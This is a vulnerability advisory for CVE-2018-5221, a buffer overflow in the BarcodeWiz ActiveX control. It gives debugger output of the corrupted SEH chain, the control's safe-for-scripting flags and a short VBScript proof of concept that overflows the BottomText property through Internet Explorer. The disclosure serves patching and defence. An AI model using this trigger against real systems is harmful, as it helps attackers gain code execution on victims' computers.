BarcodeWiz ActiveX Control 6.7 Buffer Overflow Vulnerability POC

[+] Credits: John Page (aka hyp3rlinx)
Vendor:
=================
www.barcodewiz.com
Product:
=============
BarcodeWiz ActiveX Control < 6.7
BarCodeWiz OnLabel. Generates dynamic barcodes from your imported Excel, CSV, or Access files. Print auto incrementing barcodes;
Choose from hundreds of label layouts; Export as PDF or XPS.
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
CVE-2018-5221
Security Issue:
================
BarcodeWiz.DLL BottomText and TopText propertys suffer from buffer overflow vulnerability resulting in (SEH) "Structured Exceptional Handler" overwrite .
This can be exploited by a remote attacker to potentially execute arbitrary attacker supplied code. User would have to visit a malicious webpage using
InternetExplorer where the exploit could be triggered.
SEH chain of main thread
Address    SE handler
0018DAC0   kernel32.754E48F3
0018EE34   41414141
41414141   *** CORRUPT ENTRY ***
Exception Code: ACCESS_VIOLATION
Disasm: 2045665 MOV [EDX+ECX],AL    (BarcodeWiz.DLL)
SEH Chain:
--------------------------------------------------
1   41414141
Called From                   Returns To
--------------------------------------------------
BarcodeWiz.2045665            BarcodeWiz.202FF50
BarcodeWiz.202FF50            41414141
41414141                      41414141
41414141                      41414141
41414141                      41414141
41414141                      41414141
41414141                      41414141
Report for Clsid: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
IPersist Safe:  Safe for untrusted: caller,data
IPStorage Safe:  Safe for untrusted: caller,data
Exploit/POC:
=============
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='VICTIM' />
<script language='vbscript'>
PAYLOAD=String(12308, "A")
VICTIM.BottomText = PAYLOAD
</script>

 

Leave a Reply